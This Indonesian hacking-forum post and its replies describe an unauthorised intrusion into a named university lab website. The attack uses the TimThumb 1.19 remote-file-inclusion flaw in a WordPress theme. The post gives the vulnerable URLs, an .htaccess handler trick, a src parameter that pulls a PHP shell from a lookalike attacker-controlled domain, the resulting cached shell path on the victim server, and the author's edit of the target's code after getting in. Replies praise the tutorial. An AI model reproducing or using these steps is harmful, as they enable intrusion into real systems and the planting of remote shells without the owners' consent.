Labkom Universitas Budi luhur Thimthumb Vulnaberity

[ketem]

Intoduction
Sebenernya Ga Mau Publish, Semua Email Adminnya Bouncing jadi publish aja kali yah :)

awalnya sich temen ngomong, cong tembusin aja tuch web budiluhur , kata rektornya kal bisa nembus dapet beasiswa sekolah , langsung otak ketem kelayapan, jadi anak kuliahan , banyak cewe pake rok pendek

Testing (asal jangan sekali tetes bunting aja >.<")
Pertama Tama Buka dulu webnya
( sebenernya gw udah buka semua web budi luhur cuma belum nemu maklum newbie kelas berat) nah ane tentuin dah tuch targetnya labkom coz banyak yang bilang anak labkom tuch jago jago (studi kasus ane ribut sama wardoyoko xcode mungkin dia udah nembus web ini duluan dan banyak lagi) pertama ane liat dulu source codenya ternyata ada themenya dan itu make wordpress

Code:

http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress/js/jquery.js

terus ane mikir bugs yang paling anget apan yah nah ane coba thimthumb

Code:

http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=

menghasilkan

Code:

no image specified
Query String : src=
TimThumb version : 1.19

langsung ane cari shell yang baut thimthumb nanya ke para om sepuh dece dari @[./rex] ,civo ,@[Nanda_23], dll

akhirnyda dapet dari om civo ternyata kurang .htaccsess (ane di kasih tau kang tempe_mendoan

kurang lebhnya code .htaccsess seperti ini

Code:

<FilesMatch "tes.php">
SetHandler image/gif
</FilesMatch>

Code:

file htacsessnya di tarod di server yah htp://blogger.com.blablbala itu
fungsinya kalo ga salah ( yah bener :genit) agar tes.php itu kebacanya gif sama si server tagret ( maaf mohon pencerahan kalo slah :mewek )

akhirnya ane tes

dengan url

Code:

http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=http://blogger.com.sertifikasirayon5.com/echo.php

dapet lah hasil

Code:

http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress/scripts/cache/b93b05cf280b5910c3960136fe8a258f.php

nah udah masuk yah abis masuk jangan lupa tutup pintu masuk

pergi ke file thimthumb.php pada line 27 terdapat code

Code:

$ AllowedSites = array ('flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com', 'img.youtube.com', 'upload.wikimedia.org',

'photobucket.com' ,);

ubah menjadi

Code:

$ AllowedSites = array ();

lalu ane coba lagi aksess

Code:

http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=http://blogger.com.sertifikasirayon5.com/echo.php

hasilnya

Code:

remote host "blogger.com.sertifikasirayon5.com" not allowed
Query String : src=http://blogger.com.sertifikasirayon5.com/echo.php
TimThumb version : 1.19

Spoiler for: bukti ane ga melanggar rule

akhir kata
Devilzc0de ga pernah nyaranin buat deface web lokal, namun ada beberapa teman yang mungkin kesel ngehubungin adminnya ga ada kontaknya jadi maen pepes aja..kita ga pernah tau saat deface dia lagi gmana (mungkin lagi galau) yang jelas balik lagi Devilzc0de ga pernah nyaranin buat deface web lokal apalagi nyuruh deface web lokal

---

NB : ARtikel Ini hanya buat belajar ts tidak bertanggung jawab dengan apapun akibat artikel ini

[aliend]

mantap kk
ijin pelajari ia

[hellcomex]

rerem

[sayangidia]

mantab dahg tutornya bang ..
enak dibaca dan mudah dipahami ..

mantap,,,,nice

[ozilla]

super sekali om ketem

[cangcimen]

om
masih blm ngerti nih om..
ijin belajar dulu

[junker]

keren nih

[slumd0g]

crootss..
shellnya dari workshop kmaren, jadi inget kang peti ama kang jos_ali..


btw keren bang

[Eyang Subur]

mantep bray